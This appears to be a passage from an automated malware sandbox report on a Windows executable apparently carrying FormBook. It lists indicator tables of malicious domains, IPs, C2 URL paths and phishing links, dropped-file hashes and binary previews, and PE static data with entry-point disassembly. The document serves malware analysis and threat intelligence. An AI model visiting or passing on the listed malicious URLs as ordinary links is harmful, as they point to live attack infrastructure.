	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/hkgx/
	purchase Order.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
161.97.142.144	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	www.nb-shenshi.buzz/mz7t/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.030002059.xyz/er88/
	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	www.030002350.xyz/1a7n/
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.070001813.xyz/gn0y/
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.070002018.xyz/6m2n/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.070002018.xyz/6m2n/
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	www.030002613.xyz/xd9h/
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.030002449.xyz/cfqm/
	PAYMENT_TO_NFTC_(CUB)_26-11-24.doc	Get hash	malicious	DarkTortilla, FormBook	Browse	www.070001955.xyz/7zj0/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	12621132703258916868.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	Cpfkf79Rzk.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse	13.107.246.45
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	OKkUGRkZV7.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	13.107.246.45
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	240815025266174071.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
ssbzmoy.biz	LiuUGJK9vH.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	UaOJAOMxcU.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	I3LPkQh2an.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
r0lqcud7.nbnnn.xyz	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	order confirmation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.225.159.42
	quotation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	lKvXJ7VVCK.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
pywolwnvd.biz	LiuUGJK9vH.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	UaOJAOMxcU.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	I3LPkQh2an.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	54.244.188.177
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SAIC-ASUS	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	149.88.225.249
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	149.65.180.173
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	149.88.70.60
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	149.112.181.228
	nklsh4.elf	Get hash	malicious	Unknown	Browse	149.88.70.11
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	149.65.132.204
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	149.64.118.107
	nshsh4.elf	Get hash	malicious	Mirai	Browse	149.118.255.217
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	149.88.233.72
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	149.88.73.7
CNSERVERSUS	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	172.247.112.164
	arm.elf	Get hash	malicious	Mirai	Browse	23.225.101.86
	spc.elf	Get hash	malicious	Mirai	Browse	23.225.150.24
	sh4.elf	Get hash	malicious	Mirai	Browse	23.225.149.53
	6.elf	Get hash	malicious	Unknown	Browse	41.216.185.130
	3.elf	Get hash	malicious	Unknown	Browse	41.216.185.178
	2.elf	Get hash	malicious	Unknown	Browse	41.216.185.126
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	23.224.82.187
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	23.225.125.76
AMAZON-02US	https://noiclethomas.wixsite.com/rice	Get hash	malicious	Unknown	Browse	99.86.4.105
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	108.128.172.10
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	52.208.198.158
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.32.110.93
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	108.138.26.78
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	LiuUGJK9vH.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	UaOJAOMxcU.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
CONTABODE	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	0Wu31IhwGO.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	173.249.62.84
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	173.249.62.84
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	82eqjqLrzE.exe	Get hash	malicious	AsyncRAT	Browse	144.91.79.54
	DF2.exe	Get hash	malicious	Unknown	Browse	173.249.2.110
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	173.249.11.35
	bot.m68k.elf	Get hash	malicious	Mirai	Browse	95.212.118.93

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1658880
Entropy (8bit):	4.312995031181402
Encrypted:	false
SSDEEP:	24576:hxGBcmleVg9N9JMlDlfjRiVuVsWt5MJMs:3Gy+agFIDRRAubt5M
MD5:	AB4B4378DE9DEF8797AA78370F33CFD7
SHA1:	47C100F461FFE85FCE8BAE006CDCA0977A6EC263
SHA-256:	CD5CEC0EB941B0EAE7C435959C2B4DEC90519E7DDCDB3042D0D18348507EF89B
SHA-512:	C22D3CA83CE261E95812D319EAFC6E9248C28F9E355617A26320C77C48523CAA589525DFA69F1F52417CFC4DB370154C48CC46E5D1278CF0C23D096E58137925
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................a.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autF5B2.tmp

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994591387910061
Encrypted:	true
SSDEEP:	6144:6iRDsaKhBMinMYqmchi8bGnjpnjDC4VpvmLoMpITqeveqGCss:6eTKPM/pbhO9SGdmLPpIHveqd
MD5:	188755497F2F9E69E3CD8691AD42C304
SHA1:	9148457BA37C4191F0B2DDA89C9FD2603EF2A2CA
SHA-256:	74275CA67FB35D3E6C5CC120BF6FCDAE2AB3CF00AC766610DE913296756C0AA6
SHA-512:	9EDE3CF8773ACF4A7B86BD60F445EECB471332DFC3F64DCA0F1A02DA88442D460785544272B77C806990413B3FE1069AE00DAE71A9058D14FF0F93E2B72B0DF1
Malicious:	false
Reputation:	low
Preview:	~..IMLL9BEF5..GN.Q979BBM.X03B5INLL9FEF5OFGNBQ979BBMZX03B5INL.9FEH.HG.K...8..l.0Y@bE;!+>X+e%T!((:b3\.K7,m36.w.fi##(\hHK?kFGNBQ97@CK.g8W..U..q,^._...\|').K...~".B....))..P%-{U(.GNBQ979B..ZX\|2C5.8..9FEF5OFG.BS8<8IBM.\03B5INLL9.QF5OVGNB!=79B.MZH03B7INJL9FEF5O@GNBQ979B2IZX23B5INLN9..F5_FG^BQ97)BB]ZX03B5YNLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX0.6P1:LL92.B5OVGNB.=79RBMZX03B5INLL9FeF5/FGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03

C:\Users\user\AppData\Local\Temp\autF610.tmp

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	data
Category:	dropped
Size (bytes):	14686
Entropy (8bit):	7.625735285462023
Encrypted:	false
SSDEEP:	384:dTYznwyHtzwpHjuAlYRgqRjJODs3hrExexyTeVi6T:dAwyHtzwBKWpqRjvEWR
MD5:	7E3D833B99A5C90D0BD5DCBB65B1E9E7
SHA1:	7FC369656C987E37D0D9AC4F60C76C102AC1084E
SHA-256:	4FBBE82F94EC26F88642E8A50F621538F8842D5D5387CD0F876D207AEA9B2344
SHA-512:	8BDD87DFB94093AFC9F0FBB39868D68AE37D2BE7662E082AED8530B7E5E1AE876C06597EA43E751C762ACC36A286BA07359C70272467C6C7FD7D8212EEF7655F
Malicious:	false
Reputation:	low
Preview:	EA06..0..Y&.y..+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\cyclop

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.796291363337776
Encrypted:	false
SSDEEP:	192:mNxyGyDZFui3IObbFMMVQc3GkcVoudfSq5+vLkfrOVWF/qb35mwBgZNFJahYUt0j:E
MD5:	9D0A030BAA779DC65897306F45354555
SHA1:	5D3654F3E93E3CC6938B442E9DAB7A9716373C2A
SHA-256:	271CF0E921ACBF54C70026FE40ADF10B54D89D7853E4FB28C83A4AE9BBB55235
SHA-512:	3ABDBB11975AA19387C4A18C761B013050B8FF89F3E5BDB5EA8A3912BC0970FC18C1440D124215025A1145138D344957DBBFA40A2F49DA21EF2CE97D2001EAB6
Malicious:	false
Reputation:	low
Preview:	2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9

C:\Users\user\AppData\Local\Temp\maneuverability

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994591387910061
Encrypted:	true
SSDEEP:	6144:6iRDsaKhBMinMYqmchi8bGnjpnjDC4VpvmLoMpITqeveqGCss:6eTKPM/pbhO9SGdmLPpIHveqd
MD5:	188755497F2F9E69E3CD8691AD42C304
SHA1:	9148457BA37C4191F0B2DDA89C9FD2603EF2A2CA
SHA-256:	74275CA67FB35D3E6C5CC120BF6FCDAE2AB3CF00AC766610DE913296756C0AA6
SHA-512:	9EDE3CF8773ACF4A7B86BD60F445EECB471332DFC3F64DCA0F1A02DA88442D460785544272B77C806990413B3FE1069AE00DAE71A9058D14FF0F93E2B72B0DF1
Malicious:	false
Reputation:	low
Preview:	~..IMLL9BEF5..GN.Q979BBM.X03B5INLL9FEF5OFGNBQ979BBMZX03B5INL.9FEH.HG.K...8..l.0Y@bE;!+>X+e%T!((:b3\.K7,m36.w.fi##(\hHK?kFGNBQ97@CK.g8W..U..q,^._...\|').K...~".B....))..P%-{U(.GNBQ979B..ZX\|2C5.8..9FEF5OFG.BS8<8IBM.\03B5INLL9.QF5OVGNB!=79B.MZH03B7INJL9FEF5O@GNBQ979B2IZX23B5INLN9..F5_FG^BQ97)BB]ZX03B5YNLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX0.6P1:LL92.B5OVGNB.=79RBMZX03B5INLL9FeF5/FGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03B5INLL9FEF5OFGNBQ979BBMZX03

C:\Users\user\AppData\Local\Temp\z5f52P3-

Download File

Process:	C:\Windows\SysWOW64\bitsadmin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\698ab73320bfb682.bin

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.985461755367489
Encrypted:	false
SSDEEP:	384:nAk6OfxWtbWioqh/JtbUS0gr3BDpkD5uG3NW3rpyyLuO:1ios/TbUS0g7BDi8G3NW3rrLx
MD5:	004A32530307023144D3EDDEDEE0FFEC
SHA1:	E348C3501ECDA3FCC2E54509EFDB4AF7E40158FE
SHA-256:	41D7083825FABAACC5C74F8383D8D077955A41631E7458AA10F704BE6AD6F107
SHA-512:	78667834E1C0EB5760FE613B02E88CFA400B688BA15687CCCB977B9966EC3287836C0D5E5DD1006DFB694CB4B938E2D8ACBA5983374E965A868838B0454B6E0E
Malicious:	false
Preview:	.........Aw..q...7(e.9.<............t..-c6.F....?.$.....x..-..>......}..GB.j.....z)..t.......?G..S.U.._.... .x.?S..q(\|...+....oB.....D....`....H...j.h.......c......-..r...>2.z...U...)..T.......".AKv..ON....X..,{4J...1.w1.r.{j..`.E..3..7eV2B.G..E....O.N(....]'t....u.)}..\|}...].a.e....mr......l..b.BO....3..J;T..5.G.80..-Q+....V;..2..O..l.#6mPw..{....G..g....H.W-&."Bb_...?........H.7A..F..7B......!.\YIk..A;.W......x.]......^P...-..<.j...W..0-.......=?.D.hMeE.../...a...F......,.n..C.\S........"..(g$.q..Dk..t{....VN.O.&Ua.-....`..a....S..V..v...}.$d...M....W6...d.}OJ(......6.....s..!.bOp.oM.FJ...2j.G../K................x\AG...=..O..q.Jc..$../....n#F........".Q.0N{.."...pO)1.P,...$..yd.-.I.............J....<...'.f.......\b......5.!.\....z.Y.em.....o..~^D3...y.......E.1....2z..'...KN...T......P._e.\o@h.......0tO5.M..(9........j33..K..6...."...8..,7.ZP.J.........2. R...E........E..<..CD=}<....J8/.5._.....DE.`.'..........B.i..y...`>...0...

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1348608
Entropy (8bit):	7.251573765346784
Encrypted:	false
SSDEEP:	24576:vQW4qoNUgslKNX0Ip0MgHCpoMBOubVg9N9JMlDlfjRiVuVsWt5MJMs:vQW9BKNX0IPgiKMBOuJgFIDRRAubt5M
MD5:	CFABD8BE357A65A9CA2C92F0028803C9
SHA1:	19BEB97D4FC9C53C52C16AE2C0DDE8C825E35E57
SHA-256:	ACBF54A3CEC7912A2BA07684E4D39D095B8A2978B570B30DA8FD68FB8B6E310E
SHA-512:	EEFF1C88D5B1C1DA583DE61F58E59F10843F46F38EFE1831A7CCD097C0C45C7029C481A74E0A819A493C6F61DC860969619662F37E626C02D6C797CDFDF8C9DC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\uG3I84bQEr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1594368
Entropy (8bit):	4.175692172796217
Encrypted:	false
SSDEEP:	12288:oEP3RFTV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:DFZVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	EB607CDF7D5BB12D72F7C0C992646A55
SHA1:	4FB2B90E17A3AC9D85718E8D3713EBABD7A41B26
SHA-256:	9CE5077B0DEC9A61210258092F59B5723B4D94AB146418062023474D8BE59744
SHA-512:	D2666847F797A8C69AD340422CEFBE2A6DC2E1F04A19B8643282A38279F9F64D3D042CC8F14CF2D242A1F8771932B59212DD83895D4369904A0CD5A29186FD78
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................Te.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.505754253178229
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uG3I84bQEr.exe
File size:	1'762'816 bytes
MD5:	22b40728c8fb1599479347ba89387ef4
SHA1:	7d951dd272c9b0b1e4295872d0004eb711f0eabb
SHA256:	fced488bab6f8793e1ca19858cf208ebc5c2b0ee18087489a2a35eb7fee803af
SHA512:	1717078f2f5e7d0416ac6b8bfafc9e31b6e6870654a8a1c03b928fd7c62f85154a5fb1eb4388532c7f273d56dd535bd267859eb5c7d8389741f00987c78c9223
SSDEEP:	49152:yd0c++OCvkGs9FaoePIiMbOYWgFIDRRAubt5M:eB3vkJ9DiMaWUf
TLSH:	3F85E02273DDC361CB669173FF29B7016EBF7C214630B85B2F940D79A950162262DBA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6756D804 [Mon Dec 9 11:44:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F06C0B83B0Ah
jmp 00007F06C0B768D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F06C0B76A5Ah
cmp edi, eax
jc 00007F06C0B76DBEh
bt dword ptr [004C31FCh], 01h
jnc 00007F06C0B76A59h
rep movsb
jmp 00007F06C0B76D6Ch
cmp ecx, 00000080h
jc 00007F06C0B76C24h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F06C0B76A60h
bt dword ptr [004BE324h], 01h
jc 00007F06C0B76F30h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F06C0B76BFDh
test edi, 00000003h
jne 00007F06C0B76C0Eh
test esi, 00000003h
jne 00007F06C0B76BEDh
bt edi, 02h
jnc 00007F06C0B76A5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
